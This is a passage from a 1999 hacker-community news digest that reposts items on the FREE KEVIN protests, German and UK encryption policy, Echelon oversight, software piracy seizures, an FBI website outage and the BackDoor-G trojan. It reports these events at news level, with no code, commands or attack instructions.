  5849.       From HNN http://www.hackernews.com/                                             
  5850.  
  5851.       contributed by Space Rogue 
  5852.       Several hacker conventions are either just around the
  5853.       corner or in early planning stages. Hope 2000, the third
  5854.       incarnation of the famous Hackers On Planet Earth do
  5855.       not have an official date or location yet, but they do
  5856.       have a webpage and it will probably be one of the
  5857.       biggest Hacker Conventions ever. DNSCON is shooting
  5858.       for its second year; to be held in Blackpool, England.
  5859.       WraithCon is planning on Kent University. Hit2000 has
  5860.       finnally announced a date in September. And don't
  5861.       forget the old standbys Defcon, Summercon and others
  5862.       that are just around the corner. 
  5863.  
  5864.       HNN Cons Page
  5865.       http://www.hackernews.com/cons/cons.html
  5866.  
  5867.        
  5868.       @HWA
  5869.       
  5870.        
  5871.  34.0 Friday June 4th:  FREE KEVIN Demonstrations Today! 
  5872.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
  5873.       
  5874.       From HNN http://www.hackernews.com/       
  5875.       
  5876.       
  5877.       contributed by Macki 
  5878.       At approximately 2pm local time on Friday, June 4th,
  5879.       people will gather outside at least 16 Federal
  5880.       Courthouses across the country to protest the
  5881.       continued incarceration of Kevin Mitnick. The
  5882.       demonstrations hope to bring attention to the fact that 
  5883.  
  5884.       - Kevin has been denied a bail hearing
  5885.       - Lack of access by the defense to critical evidence
  5886.       - The outrageous claims by software companies as to
  5887.       the amounts of damages caused by copying software.
  5888.       - When this was reported by the media the court
  5889.       blocked access to the defense to further information.
  5890.  
  5891.       Kevin Mitnick has never been accused of being violent,
  5892.       malicious, or getting any sort of compensation for his
  5893.       acts and yet he has been in jail for over four years.
  5894.       Longer than most armed robbers or rapists.
  5895.  
  5896.       It is hoped that these peaceful demonstrations can
  5897.       increase public awareness of this issue and hopefully
  5898.       positively influence his sentencing hearing scheduled for
  5899.       June 14th. 
  5900.  
  5901.       Official Press Release
  5902.       http://www.hackernews.com/orig/mitnickpr.html
  5903.       
  5904.       FREE KEVIN Demonstrations
  5905.       http://www.2600.net/demo/
  5906.       
  5907.       ZD Net
  5908.       http://www.zdnet.com/zdnn/stories/news/0,4586,2269826,00.html
  5909.       
  5910.       Salon
  5911.       http://www.salon.com/tech/log/1999/06/04/mitnick/index.html
  5912.       
  5913.  
  5914.       Already over, the demonstration in front of the US
  5915.       Embassy in Moscow has been labeled a huge success.
  5916.       This photo taken prior to the event shows some folks
  5917.       from Civil Hackers' School in Moscow and a
  5918.       conspicuously placed FREE KEVIN Sticker. 
  5919.  
  5920.       Moscow Demonstration Picture
  5921.       http://www.hackernews.com/images/kewl4.html
  5922.  
  5923.       The demonstration in Washington DC is going to try like
  5924.       hell to webcast the event but their resources are
  5925.       limited. You can try here or here. Hopefully one of them
  5926.       will work. 
  5927.       
  5928.       http://www.SteveNet.net/2600/
  5929.       http://members.xoom.com/gmontag/
  5930.       
  5931.  
  5932.       There are rumors that several of the demonstrations,
  5933.       especially the one in Atlanta which is the first event of
  5934.       Summercon, will be broadcast live on CNN. We will do
  5935.       our best to bring you updates as necessary. 
  5936.       
  5937.       http://www.summercon.org/
  5938.  
  5939.       Late Update 
  5940.       The Philidelphia demonstartion is also attempting to web
  5941.       cast their event. We should hopefully have a URL for
  5942.       you soon. 
  5943.  
  5944.       Demonstration are also happening spontaneously in
  5945.       cities that are not listed on the official web page. HNN
  5946.       has received reports of a demonstration taking place in
  5947.       Boston.       
  5948.       
  5949.       
  5950.       FOR IMMEDIATE RELEASE 
  5951.  
  5952.      NATIONWIDE DEMONSTRATIONS ON FRIDAY TO
  5953.      PROTEST HACKER INCARCERATION 
  5954.  
  5955.      NATIONWIDE CONTACT: Emmanuel Goldstein,
  5956.      917-945-26╪╪ 
  5957.  
  5958.      On Friday, June 4 at 2 pm, demonstrations will take
  5959.      place outside federal courthouses nationwide to
  5960.      protest the continued incarceration of Kevin Mitnick,
  5961.      imprisoned without bail in a pre-trial facility in Los
  5962.      Angeles for over four years. 
  5963.  
  5964.      The demonstrations are being organized by the
  5965.      FREE KEVIN movement and seek to shed light on
  5966.      the many injustices of this case. 
  5967.  
  5968.      They include: 
  5969.  
  5970.      --) Mitnick's denial of a bail hearing, something even
  5971.      a terrorist is given. 
  5972.  
  5973.      --) The inability of Mitnick's defense to have access
  5974.      to the evidence against him, making it impossible for
  5975.      them to mount an adequate defense. 
  5976.  
  5977.      --) The highly dubious claims of certain cellular
  5978.      phone companies in letters obtained by us which
  5979.      state that Mitnick's mere glancing at their source
  5980.      code cost them hundreds of millions of dollars.
  5981.      These losses were never reported to their
  5982.      stockholders as required by the SEC. 
  5983.  
  5984.      --) When the media started to report on these
  5985.      disclosures, the court's response was to prevent
  5986.      any further documentation from being released. 
  5987.  
  5988.      Throughout this ordeal, Mitnick has never been
  5989.      accused of doing anything malicious, profiting in any
  5990.      way from his talents, or being a violent criminal. Yet,
  5991.      since February 15, 1995 he has been locked away
  5992.      with some of the most dangerous people around. 
  5993.  
  5994.      Our demonstrations will take place to spread the
  5995.      word and put pressure on the appropriate
  5996.      authorities to end this nightmare once and for all.
  5997.      Even those who think Mitnick is guilty of everything
  5998.      he's been accused of are outraged by his continued
  5999.      incarceration. On June 14, the judge in his case will
  6000.      have the option of recommending his immediate
  6001.      release to a halfway house or extending his prison
  6002.      term even longer. 
  6003.  
  6004.      For  more information on the Mitnick case,  check
  6005.      www.freekevin.com. For more information on the 
  6006.      demonstrations, contact one of the above people or
  6007.      check www.2600.com/demo. 
  6008.  
  6009.       
  6010.      @HWA
  6011.  
  6012.  35.0 Germany Frees Crypto 
  6013.       ~~~~~~~~~~~~~~~~~~~~ 
  6014.  
  6015.       From HNN http://www.hackernews.com/       
  6016.  
  6017.       contributed by Seraphic Artifex 
  6018.       German officials have released a statement on crypto
  6019.       policy. The statement says that for the worldwide
  6020.       protection against electronic interception and economic
  6021.       espionage that the strongest crypto available will be
  6022.       allowed to be used by German citizens. In addition the
  6023.       crypto development community within Germany will be
  6024.       supported and nurtured to create superior crypto
  6025.       products. The statement claims that the need of
  6026.       personal privacy and the protection e-commerce
  6027.       overrides any possible use crypto may have for
  6028.       criminals. 
  6029.  
  6030.       German cryptography policy statement
  6031.       http://www.bmwi.de/presse/1999/0602prm1.html
  6032.       
  6033.       English Translation
  6034.       http://jya.com/de-crypto.htm
  6035.       
  6036.       Wired      
  6037.       http://www.wired.com/news/news/politics/story/20023.html
  6038.       
  6039.       Wired;
  6040.       
  6041.       Germany Endorses Strong Crypto
  6042.       Wired News Report 
  6043.  
  6044.       5:20 p.m.  3.Jun.99.PDT
  6045.       In an apparent response to corporate
  6046.       spying allegedly conducted in Europe by
  6047.       the United States, Germany is
  6048.       encouraging citizens and businesses to
  6049.       use strong cryptography. 
  6050.  
  6051.       "[Germany] considers the application of
  6052.       secure encryption to be a crucial
  6053.       requirement for citizens' privacy, for the
  6054.       development of electronic commerce, and
  6055.       for the protection of business secrets,"
  6056.       reads a translated version of a policy
  6057.       framework document released Wednesday
  6058.       by Germany's Federal Ministry of
  6059.       Economic Affairs and Technology. 
  6060.  
  6061.       "The federal government will therefore
  6062.       actively support the distribution of secure
  6063.       encryption. This includes in particular
  6064.       increasing the security consciousness of
  6065.       citizens, business, and administration." 
  6066.  
  6067.       Australia recently became the first nation
  6068.       to admit it participates in Echelon, a
  6069.       previously secret global surveillance
  6070.       network capable of intercepting
  6071.       electronic communications anywhere in
  6072.       the world. 
  6073.  
  6074.       
  6075.       Echelon is said to be principally operated
  6076.       by the United States' National Security
  6077.       Agency and its UK equivalent, the
  6078.       Government Communications
  6079.       Headquarters. In addition to Australia,
  6080.       the system relies on cooperation with
  6081.       other signals-intelligence agencies in
  6082.       Canada and New Zealand. 
  6083.  
  6084.       Earlier this month, UK investigative
  6085.       journalist Duncan Campbell submitted
  6086.       Interception Capabilities 2000, his report
  6087.       on Echelon, to the European Parliament's
  6088.       Science and Technology Options
  6089.       Assessment Panel. 
  6090.  
  6091.       Campbell had been asked to investigate
  6092.       the system in the wake of charges made
  6093.       last year in the European Parliament that
  6094.       Echelon was being used to funnel
  6095.       European government and industry
  6096.       secrets into US hands. In the wake of the
  6097.       report, the Australian government
  6098.       confirmed the Echelon alliance to media in
  6099.       follow-up interviews. 
  6100.  
  6101.       Though Wednesday's German government
  6102.       statement does not mention Echelon, the
  6103.       document alludes to the specter of
  6104.       industrial espionage. 
  6105.  
  6106.       "For reasons of national security, and the
  6107.       security of business and society, the
  6108.       federal government considers the ability
  6109.       of German manufacturers to develop and
  6110.       manufacture secure and efficient
  6111.       encryption products indispensable," the
  6112.       statement said. 
  6113.  
  6114.       The government added that it would take
  6115.       additional measures to strengthen its
  6116.       domestic crypto software industry. 
  6117.  
  6118.       The policy also cautioned that while
  6119.       encryption may be used to criminal ends,
  6120.       the need to protect electronic commerce
  6121.       overrides any such concerns. The
  6122.       department said it would prepare and
  6123.       release a report on the criminal uses of
  6124.       cryptography within two years. 
  6125.  
  6126.       The US government restricts the export
  6127.       of strong crypto on the grounds that it
  6128.       might be used by terrorists and hostile
  6129.       nations to conceal communications. 
  6130.       
  6131.       -=-
  6132.       
  6133.       Policy statement;
  6134.       
  6135.       
  6136.                                                  Federal Ministry of the Interior
  6137.                                         Federal Ministry of Economic Affairs and Technology 
  6138.       
  6139.       Bonn, June 2, 1999 
  6140.       
  6141.                                  Cornerstones of German Encryption Policy 
  6142.       
  6143.       The Federal Cabinet in its session of June 2 agreed on the German position on the use of cryptographical methods in e-commerce in the form of ôCornerstones of
  6144.       German Encryption Policyö. 
  6145.       
  6146.       The government followed the necessity to take position in this nationally and internationally vital question important for business and e-commerce. Security problems are
  6147.       on the rise with growing traffic on the net. Experts are estimating the losses caused by espionage, manipulation, or damaging of data by billions. Data security is
  6148.       becoming a serious issue with global competition and because of that is affecting jobs in respective businesses. 
  6149.       
  6150.       Improved protection of German users on the net by means of better encryption methods is the main concern of this decision. It states clearly that cryptographic methods
  6151.       and products are furthermore permitted to be developed, produced, and used without any restrictions. The yet low awareness towards this issue shall be raised by this
  6152.       decision. The initiative ôSecurity On The Netö by ministries of economic affairs and interior is meant to serve the same purpose <http://www.sicherheit-im-internet.de> 
  6153.       
  6154.       Another main aim of the German federal government is to strengthen productivity and international competitiveness of the German suppliers in encryption business
  6155.       which are likely to intensify their efforts with regards to a growing demand. The further opening of the European single market is serving the same purpose: Germany
  6156.       together with its European partners abolished supervision of encryption mass products exported within the EU by revising the EU-dual-use-decree. Simplification of
  6157.       export supervision procedure are under examination by the Bundesausfuhramt (federal export agency?) 
  6158.       
  6159.       With the use of cryptography on the raise improper use canÆt be ruled out. Therefore the involved ministries will be watching further development thoroughly and deliver
  6160.       a report after 2 years. Efforts to improve the technical equipment of law enforcement agencies are underway. 
  6161.       
  6162.       With this well-balanced position the federal government met the requirements for Germany being a secure and productive site in the information age. 
  6163.       
  6164.       
  6165.       
  6166.       Cornerstones of German Crypto Policy 
  6167.       
  6168.       Introduction 
  6169.       
  6170.       Hard- and software for message encoding remained until the beginning of the nineties a negligible niche market. However this niche market is now of considerable
  6171.       importance to the economic and social development in the information age. The input öinformationö is developing more and more into a much demanded raw material.
  6172.       Effectively protecting this asset could can be crucial to corporate success and thus determine on prospective employment. This protection today can be effectively
  6173.       ensured only by use of strong encryption tools. 
  6174.       
  6175.       Controversy on encryption in Germany 
  6176.       
  6177.       The controversy on encryption is about whether or not and to which extent cryptography should be restricted by law. This point has been discussed recently in many
  6178.       democratic industrial countries in a controversial way. An intensive argument took place in Germany too, with several ministries, industry, and numerous social groups
  6179.       participating. 
  6180.       
  6181.       In October 1997 the federal cabinet passed the öFederal report: Info 2000: Germany's way into the information ageö, containing a passage on cryptography: 
  6182.       
  6183.            öThe Federal Government agrees on waiving to regulate by law the trade and use of cryptographic products and methods. Thus the unrestricted freedom
  6184.            of users with choosing and use of encryption systems remains not affected. The Federal Government will watch further development in the field of
  6185.            cryptography thoroughly particularly within a European and international context. Further measures to reach its goals will be taken if necessary. ö 
  6186.       
  6187.       So far the Federal Government has not taken stand definitely and unequivocally. 
  6188.       
  6189.       Cryptography and economic interests 
  6190.       
  6191.       Due to the dynamic development of digital business dealings the markets for encryption products note high growth rates. Besides the traditional protection of confidence
  6192.       by now encryption systems are mainly used e.g. for digital copyright protection, digital signatures, and digital cash. Beyond this cryptography is a
  6193.       cross-section-technology indispensable for architecture and development of complex e-commerce applications. Indirectly much bigger markets are concerned like e.g.
  6194.       telecommunication, online-banking, or tele-medicine. 
  6195.       
  6196.       ItÆs true that present-day security standards, few years ago affordable only to large-scale enterprises and administration, are now within means of medium-sized and
  6197.       small enterprises as well as private households. But still in Germany cryptography is not used in the required degree. The necessary security awareness is lacking
  6198.       frequently even though considerable losses can be caused by espionage, manipulation, or destruction of data. German crypto manufacturers would have a good chance
  6199.       of keeping up with international competition, if appropriate conditions are ensured. In view of the strategic meaning of the cryptographic sector many important industrial
  6200.       states spare no effort in order to strengthen their economical and technical capacities. 
  6201.       
  6202.       Cryptography and security interests 
  6203.       
  6204.       Cryptographic methods are of outstanding importance for efficient technical crime protection. That applies to ensuring of authenticity and integrity in data traffic as well
  6205.       as protection of confidence. 
  6206.       
  6207.       On the other hand protection of confidence is in favor of perpetrators: With cryptographic applications becoming more user-friendly spreading into criminal circles has to
  6208.       be expected. This could cause serious problems for law enforcement. Lawful surveillance ordered by a court has to remain effective even if the target guards
  6209.       concerned information with a cryptographic system. 
  6210.       
  6211.       Up to now abuse of encryption constitutes no serious problem for law enforcement. However there canÆt be derived a forecast from this. It is necessary to actively
  6212.       examine possible consequences with regard to the specific needs of law enforcement and national security to early identify any undesirable development and take
  6213.       effective action against them based on alternative strategies. 
  6214.       
  6215.       With the recent national discussion as well as the international development as foundations the Federal Government agrees on the following
  6216.       cornerstones of encryption policy: 
  6217.       
  6218.       1. The Federal Government is not intended to restrict the general availability of cryptographic products in Germany. It recognizes the crucial importance of secure
  6219.       encryption for data protection, development of electronic business dealings, and protection of corporate secrets. Therefore the Federal Government will actively support
  6220.       spreading of secure encryption in Germany. This is meant to particularly promote awareness on security issues among business, administration, and private people. 
  6221.       
  6222.       2. The Federal Government aims at strengthening users to trust in cryptographic security. It will take measures to establish a trust framework for secure cryptography,
  6223.       particularly by improving the ability to check cryptographic products on security and recommending of qualified products. 
  6224.       
  6225.       3. The Federal Government considers the capability of German manufacturers to develop and manufacture secure and powerful cryptographic products as crucial to
  6226.       security of nation, business, and society. It will take actions to improve the international competitiveness in this field. 
  6227.       
  6228.       4. The legal authority of law enforcement and security agencies to keep telecommunication under surveillance shall not be eroded by dissemination of strong methods for
  6229.       encryption. Therefore the competent ministries will be watching further development thoroughly and report after 2 years. Irrespective of that the Federal Government
  6230.       will support improving technical competence of law enforcement within the bounds of its possibilities. 
  6231.       
  6232.       5. The Federal Government sets a great store by international cooperation in the field of encryption. It stands up for market-developed open standards as well as
  6233.       interoperable systems and will speak up for strengthening of multi- and bilateral cooperation. 
  6234.             
  6235.       @HWA
  6236.  
  6237.  
  6238.  36.0 US Congress Demands Echelon Docs 
  6239.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6240.  
  6241.       From HNN http://www.hackernews.com/       
  6242.  
  6243.       contributed by Code Kid 
  6244.       An amendment to the fiscal 2000 Intelligence
  6245.       Authorization Act proposed last month by Sen. Bob Barr
  6246.       (R-Ga.) will force the director of Central Intelligence,
  6247.       the director of NSA and the attorney general to submit
  6248.       a report to Congress that outlines the legal standards
  6249.       being employed to safeguard the privacy of American
  6250.       citizens against Project Echelon. 
  6251.  
  6252.       Federal Computer Week      
  6253.       http://www.fcw.com:80/pubs/fcw/1999/0531/web-nsa-6-3-99.html
  6254.       
  6255.       
  6256.       JUNE 3, 1999 . . . 18:34 EDT 
  6257.  
  6258.  
  6259.       Congress, NSA butt heads over Echelon
  6260.  
  6261.       BY DANIEL VERTON (dan_verton@fcw.com)
  6262.  
  6263.       Congress has squared off with the National Security Agency over a
  6264.       top-secret U.S. global electronic surveillance program, requesting top
  6265.       intelligence officials to report on the legal standards used to prevent privacy
  6266.       abuses against U.S. citizens.
  6267.  
  6268.       According to an amendment to the fiscal 2000 Intelligence Authorization Act
  6269.       proposed last month by Rep. Bob Barr (R-Ga.), the director of Central
  6270.       Intelligence, the director of NSA and the attorney general must submit a report
  6271.       within 60 days of the bill becoming law that outlines the legal standards being
  6272.       employed to safeguard the privacy of American citizens against Project
  6273.       Echelon.
  6274.  
  6275.       Echelon is NSA's Cold War-vintage global spying system, which consists of a
  6276.       worldwide network of clandestine listening posts capable of intercepting
  6277.       electronic communications such as e-mail, telephone conversations, faxes,
  6278.       satellite transmissions, microwave links and fiber-optic communications traffic.
  6279.       However, the European Union last year raised concerns that the system may be
  6280.       regularly violating the privacy of law-abiding citizens [FCW, Nov. 17, 1998]. 
  6281.  
  6282.       However, NSA, the supersecret spy agency known best for its worldwide
  6283.       eavesdropping capabilities, for the first time in the history of the House
  6284.       Permanent Select Committee on Intelligence refused to hand over documents
  6285.       on the Echelon program, claiming attorney/client privilege.
  6286.  
  6287.       Congress is "concerned about the privacy rights of American citizens and
  6288.       whether or not there are constitutional safeguards being circumvented by the
  6289.       manner in which the intelligence agencies are intercepting and/or receiving
  6290.       international communications...from foreign nations that would otherwise be
  6291.       prohibited by...the limitations on the collection of domestic intelligence," Barr
  6292.       said. "This very straightforward amendment...will help guarantee the privacy
  6293.       rights of American citizens [and] will protect the oversight responsibilities of the
  6294.       Congress which are now under assault" by the intelligence community.
  6295.  
  6296.       Calling NSA's argument of attorney/client privilege "unpersuasive and dubious,"
  6297.       committee chairman Rep. Peter J. Goss (R-Fla.) said the ability of the
  6298.       intelligence community to deny access to documents on intelligence programs
  6299.       could "seriously hobble the legislative oversight process" provided for by the
  6300.       Constitution and would "result in the envelopment of the executive branch in a
  6301.       cloak of secrecy."
  6302.  
  6303.       
  6304.       @HWA
  6305.       
  6306.  37.0 Windows2000 Already Available 
  6307.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6308.  
  6309.       From HNN http://www.hackernews.com/       
  6310.  
  6311.       contributed by 0Day 
  6312.       Officials in Singapore have confiscated over 700 pirated
  6313.       copies of Microsoft Windows2000 from area merchants.
  6314.       Raids last Monday turned up the software at two
  6315.       different retailers in residential areas of Katong and
  6316.       Kallang, Singapore. Windows2000 has not yet been
  6317.       officially released. 
  6318.  
  6319.       The Straits Times     
  6320.       http://web3.asia1.com.sg/archive/st/4/cyb/cyb1_0603.html
  6321.       
  6322.       
  6323.       JUN 3 1999 
  6324.  
  6325.       Pirated Office 2000 being sold 
  6326.  
  6327.       PIRATED copies of Microsoft Office 2000 are already
  6328.       being sold here though the official launch of the new
  6329.       software takes place only next Monday. Two raids last
  6330.       Monday turned up the pirated copies. They were found at
  6331.       two retail outlets in residential areas at Katong and
  6332.       Kallang. Microsoft Singapore said in a statement on
  6333.       Tuesday that its representatives and the Intellectual
  6334.       Property Rights Warrant Unit seized about 700
  6335.       CD-ROMs containing pirated software. 
  6336.  
  6337.       Microsoft's regional anti-piracy spokesman Rebecca Ho
  6338.       said: "This is an illustration of the pervasiveness of the
  6339.       problem and the speed with which pirates operate." 
  6340.  
  6341.       Microsoft warns that counterfeit software can contain
  6342.       viruses that could cause problems to a computer's
  6343.       software and hardware, and cost hundreds or thousands
  6344.       of dollars to fix. 
  6345.       
  6346.       @HWA
  6347.       
  6348.  38.0 NetBus Takes #1 Spot 
  6349.       ~~~~~~~~~~~~~~~~~~~~
  6350.  
  6351.       From HNN http://www.hackernews.com/ 
  6352.  
  6353.  
  6354.       contributed by judd 
  6355.       After given a 5 cow review from TUCOWS Netbus Pro,
  6356.       the remote administrartion software recently turned
  6357.       shareware has reached the #1 spot at DaveCentral
  6358.       after only five dayss. 
  6359.  
  6360.       Dave Central
  6361.       http://www.davecentral.com/hot.html
  6362.       
  6363.       NetBus     
  6364.       http://www.netbus.org
  6365.       
  6366.       
  6367.       @HWA
  6368.       
  6369.  39.0 [ISN] Police will have 24-hour access to secret files
  6370.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6371.  
  6372.       http://www.the-times.co.uk/news/pages/tim/99/05/27/timnwsnws01019.html?999
  6373.       
  6374.       
  6375.       May 27 1999  BRITAIN 
  6376.       Police will have 24-hour access to secret files
  6377.       Stewart Tendler 
  6378.       E-mail code-busters to join crime fight 
  6379.       
  6380.       
  6381.       A 24-HOUR technical centre to help to crack secret Internet and e-mail
  6382.       systems used by criminals is being set up by the computer industry and the
  6383.       police. 
  6384.       
  6385.       
  6386.       The centre will open encrypted messages for officers who have a warrant.
  6387.       If the codes cannot be cracked it will call in computer specialists.
  6388.       
  6389.       
  6390.       Ministers are also introducing laws giving police and Customs
  6391.       investigators powers to order Internet operators to unlock encrypted
  6392.       systems for taps. Users could also be forced to hand over codes protecting
  6393.       information.
  6394.       
  6395.       
  6396.       The plans were announced yesterday as ministers released a report by the
  6397.       Cabinet Office's Performance and Innovation Unit on the problems of
  6398.       encryption and police investigations.
  6399.       
  6400.       
  6401.       The report revealed that telephones taps last year led to the seizure of
  6402.       three tonnes of heroin and cocaine and the arrest of 1,200 criminals. 
  6403.       
  6404.       
  6405.       Underlining that interceptions have become an "essential tool" the report
  6406.       said that one suspect involved in serious crime was arrested for every two
  6407.       warrants issued by Jack Straw, the Home Secretary.
  6408.       
  6409.       
  6410.       Interceptions became vital when intelligence could not be obtained by
  6411.       surveillance or informants. In 1996-97 the taps resulted in the seizure of
  6412.       450 guns and 112 tonnes of drugs, such as cannabis, worth #600 million. 
  6413.       
  6414.       
  6415.       Looking at ways of dealing with the rise of encryption programmes for
  6416.       e-mail and telephone systems, the report found that although there was
  6417.       general public acceptance of current telephone taps there was strong
  6418.       aversion in some areas to secret police access to the Internet.
  6419.       
  6420.       
  6421.       The Government has already ruled out creating an authority which would
  6422.       hold the "keys" to encrypted systems sold by licensed firms and allow
  6423.       access to investigators. The report concluded that such a plan would be
  6424.       unwieldy and still would not give police enough access. 
  6425.       
  6426.       
  6427.       Yesterday Mr Straw said the plans showed that government and industry
  6428.       could work together. The aim was to develop the use of the Internet for
  6429.       commerce without encouraging or helping crime.
  6430.       
  6431.       
  6432.       Case histories released yesterday show how terrorists and paedophiles are
  6433.       already using encryption and slowing or halting investigations.
  6434.       
  6435.       
  6436.       In 1995 two men were arrested in the Home Counties and accused of being at
  6437.       the centre of a ring putting out child pornography. Detectives believed
  6438.       that encrypted material had been sent worldwide. The men were later jailed
  6439.       but 10 per cent of the material was never uncovered. Last year police
  6440.       investigating sex and attempted murder allegations found encrypted
  6441.       material on a suspect's computer. They finally cracked the code when they
  6442.       discovered the decryption key among other material.
  6443.       
  6444.       
  6445.       -o-
  6446.       Subscribe: mail majordomo@repsec.com with "subscribe isn".
  6447.       Today's ISN Sponsor: OSAll [www.aviary-mag.com]
  6448.       
  6449.       @HWA     
  6450.       
  6451.       
  6452.  40.0 [ISN] Hack attack knocks out FBI site
  6453.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
  6454.    
  6455.       FBI cracks down on hacker group -- then fbi.gov is knocked offline by hack
  6456.       attack. 
  6457.       
  6458.       
  6459.       By Bob Sullivan and Brock Meeks, MSNBC
  6460.       May 26, 1999 6:44 PM PT 
  6461.       
  6462.       
  6463.       A skirmish between the FBI and a well-known hacker group seemingly erupted
  6464.       Wednesday. 
  6465.          
  6466.       Not long after federal agents served search warrants on members of hacker
  6467.       group Global Hell (gH), probably in connection with recent attacks on U.S. 
  6468.       government computers, the FBI's own Web site was attacked and is currently
  6469.       offline. 
  6470.          
  6471.       Earlier on Wednesday, MSNBC was told by a member of gH that the FBI had
  6472.       served search warrants on several members of the hacker group. Last week,
  6473.       gH member Eric Burns (who also goes by the name Zyklon), was arrested in
  6474.       connection with three separate attacks on U.S. government computers,
  6475.       including systems at the U.S. Information Agency. 
  6476.          
  6477.       A hacker identifying himself as "Most Hated," the founder of gH, told
  6478.       MSNBC he was raided by agents at about 6 a.m. Wednesday morning in what he
  6479.       described as a "a huge hacker crackdown." 
  6480.          
  6481.       He said he knows of nine people who were raided by government officials --
  6482.       including four in Houston, three in California and one in Seattle. None
  6483.       was arrested, but all had computer equipment confiscated, he said. 
  6484.          
  6485.       Late Wednesday, www.fbi.gov stopped working. 
  6486.          
  6487.       Credit claimed for hack
  6488.       
  6489.       
  6490.       According to the Web site www.antionline.com, an individual calling
  6491.       himself Israeli Ghost was taking credit for the attack on the FBI's
  6492.       site.
  6493.       
  6494.       
  6495.       The FBI was not immediately available to comment. 
  6496.          
  6497.       "FBI WILL NOT {expletive deleted} WITH MY FRIENDS FROM GLOBAL HELL," the
  6498.       hacker allegedly wrote in an e-mail to Antionline. 
  6499.          
  6500.       Other members of the hacking community, contacted by MSNBC, said the FBI
  6501.       site was hit by what's called a denial of service attack. In such an
  6502.       attack, the host computer is not actually controlled by an outsider;
  6503.       rather, outsiders bombard a Web site with so many simultaneous hits that
  6504.       it becomes overwhelmed and can no longer function.
  6505.          
  6506.       Most Hated said he didn't know who was responsible for the DOS attack.  He
  6507.       said the FBI agents who raided him said the raid was in connection with
  6508.       "illegal telecom activity," which he believes is related to fraudulent
  6509.       teleconferences he set up. 
  6510.          
  6511.       White House hack connection
  6512.       
  6513.       
  6514.       "The FBI told me that they were looking into illegal telecom activity," 
  6515.       Most Hated told MSNBC. "The FBI said some company lost $250,000." 
  6516.       
  6517.       
  6518.       
  6519.       -o-
  6520.       Subscribe: mail majordomo@repsec.com with "subscribe isn".
  6521.       Today's ISN Sponsor: OSAll [www.aviary-mag.com]
  6522.       
  6523.       @HWA     
  6524.       
  6525.  41.0 [ISN] What's a Little Hacking Between Friends?
  6526.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6527.  
  6528.  
  6529.       http://www.zdnet.com/zdtv/siliconspin/features/story/0,3725,2245017,00.html
  6530.       
  6531.       
  6532.       What's a Little Hacking Between Friends?
  6533.       Spin debates hacking: Enjoyable hobby or criminal activity?
  6534.       
  6535.       
  6536.       How much does hacking hurt? The companies hacked by Kevin Mitnick say the
  6537.       intrusions cost them millions of dollars in lost business and damages--
  6538.       and they're handing him a collective restitution bill of $300 million. 
  6539.       
  6540.       
  6541.       Mitnick's lawyer, Don Randolph, says it's moot. Mitnick has spent years in
  6542.       jail, and when he gets out will be forbidden to touch a computer. Even
  6543.       discounting his legal bills, Mitnick is broke. 
  6544.       
  6545.       
  6546.       Trying to decide how harmful hacking really is sent the Spin panel into a
  6547.       tizzy.  ZDTV's managing editor, Shauna Sampson, aligned with Forbes'
  6548.       Dennis Kneale to play down the dark side of hacking, while Suzanne
  6549.       Anderson from GlobalNet Ventures looked at the cost to businesses. 
  6550.       Finally, Spencer Ante of thestreet.com discussed how these financials can
  6551.       affect the market. 
  6552.       
  6553.       
  6554.       [snip...]
  6555.       
  6556.       
  6557.       -o-
  6558.       Subscribe: mail majordomo@repsec.com with "subscribe isn".
  6559.       Today's ISN Sponsor: OSAll [www.aviary-mag.com]
  6560.       
  6561.       @HWA
  6562.       
  6563.  42.0 [ISN] New hacker attack uses screensavers
  6564.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6565.  
  6566.       http://www.news.com/News/Item/0,4,37180,00.html?st.ne.fd.tohhed.ni
  6567.       
  6568.       
  6569.       New hacker attack uses screensavers
  6570.       By Erich Luening
  6571.       Staff Writer, CNET News.com
  6572.       May 28, 1999, 8:20 a.m. PT
  6573.       
  6574.       
  6575.       A new Trojan horse program sent by a hacker over the Internet via an email
  6576.       spam format as a screensaver could allow PCs to be accessed by
  6577.       unauthorized users. 
  6578.       
  6579.       
  6580.       BackDoor-G Trojan horse is considered a potentially dangerous new Trojan
  6581.       horse program that could allow hackers to remotely access and control
  6582.       infected PCs over the Internet, according to network security and
  6583.       management software maker Network Associates. 
  6584.       
  6585.       
  6586.       BackDoor-G affects Windows-based PCs. When executed, BackDoor-G turns a
  6587.       user's system into a client system for a hacker, giving virtually
  6588.       unlimited remote access to the system over the Internet. The Trojan also
  6589.       is virtually undetectable by the user, although it has been reported as
  6590.       spreading as a screensaver and an update to a computer game. 
  6591.       
  6592.       
  6593.       The program is the latest in a string of new hybrid security threats that
  6594.       blur the line between viruses, security exploits, and malicious code
  6595.       attacks, the company said. 
  6596.       
  6597.       
  6598.       BackDoor-G is difficult to detect because it is able to change its
  6599.       filename and therefore hide from some traditional virus eradication
  6600.       methods such as simply deleting suspicious files. 
  6601.       
  6602.       
  6603.       Though BackDoor-G is not technically a virus, Network Associates advises
  6604.       PC users to request an update for both their antivirus and
  6605.       intrusion-detection software from their system administrators. 
  6606.       
  6607.       
  6608.       Sal Viveros, group marketing manager for Total Virus Defense at Network
  6609.       Associates, said the company has received a few dozen samples of the
  6610.       attack since midmorning yesterday. 
  6611.       
  6612.       
  6613.       "There is no one file name it uses," he said. "It spreads everywhere in
  6614.       the system. 
  6615.       
  6616.       
  6617.       "There is a trend here. We're seeing more and more programs that are
  6618.       stealing information or creating holes to get access to systems remotely,"
  6619.       Viveros added. 
  6620.       
  6621.       
  6622.       
  6623.       -o-
  6624.       Subscribe: mail majordomo@repsec.com with "subscribe isn".
  6625.       Today's ISN Sponsor: OSAll [www.aviary-mag.com]
  6626.       
  6627.       @HWA     
  6628.       
  6629.       
  6630. 43.0 [ISN] Hackers beware: IBM to sharpen Haxor
  6631.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6632.  
  6633.  
  6634.       
  6635.       Forwarded From: root <root@packetstorm.harvard.edu>
  6636.       
  6637.       
